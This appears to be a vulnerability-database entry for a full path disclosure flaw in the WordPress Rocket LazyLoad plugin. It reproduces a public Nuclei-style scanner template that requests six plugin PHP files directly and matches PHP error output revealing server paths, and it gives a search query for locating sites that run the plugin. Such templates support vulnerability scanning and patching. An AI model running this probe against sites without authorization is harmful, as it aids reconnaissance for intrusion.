wordpress-rocket-lazy-load-fpd: WordPress LazyLoad Plugin - Full Path Disclosure

日期: 2026-02-03 | 影响软件: 未知 | POC: 已公开

漏洞描述

WordPress Plugin LazyLoad files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.

PoC代码[已公开]

id: wordpress-rocket-lazy-load-fpd

info:
  name: WordPress LazyLoad Plugin - Full Path Disclosure
  author: DhiyaneshDk
  severity: low
  description: |
    WordPress Plugin LazyLoad files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
  reference:
    - https://wordpress.org/plugins/rocket-lazy-load/
  metadata:
    verified: true
    max-request: 6
    publicwww-query: "/plugins/rocket-lazy-load"
  tags: wp,wordpress,wp-plugin,fpd,rocket-lazy-load,misconfig

http:
  - method: GET
    path:

      - "{{BaseURL}}/wp-content/plugins/rocket-lazy-load/src/Subscriber/AdminPageSubscriber.php"
      - "{{BaseURL}}/wp-content/plugins/rocket-lazy-load/src/Subscriber/LazyloadSubscriber.php"
      - "{{BaseURL}}/wp-content/plugins/rocket-lazy-load/src/ServiceProvider/AdminServiceProvider.php"
      - "{{BaseURL}}/wp-content/plugins/rocket-lazy-load/src/ServiceProvider/ImagifyNoticeServiceProvider.php"
      - "{{BaseURL}}/wp-content/plugins/rocket-lazy-load/src/ServiceProvider/LazyloadServiceProvider.php"
      - "{{BaseURL}}/wp-content/plugins/rocket-lazy-load/src/ServiceProvider/SubscribersServiceProvider.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 || status_code == 500'
          - 'contains(body, "rocket-lazy-load")'
          - 'contains_all(body, "Fatal error", "Uncaught Error") || contains_all(body, "Warning:","failed to open stream")'
        condition: and
# digest: 4b0a00483046022100faaee6e8cc150f83a81f2db24177eb037d468b0f8a9490dfc0b8ad56d22669f1022100aac8bcdda272ad5dcd0064c14b3fae8d7f7d5b7e4afda355bdefecfa6c811122:922c64590222798bb761d5b6d8e72950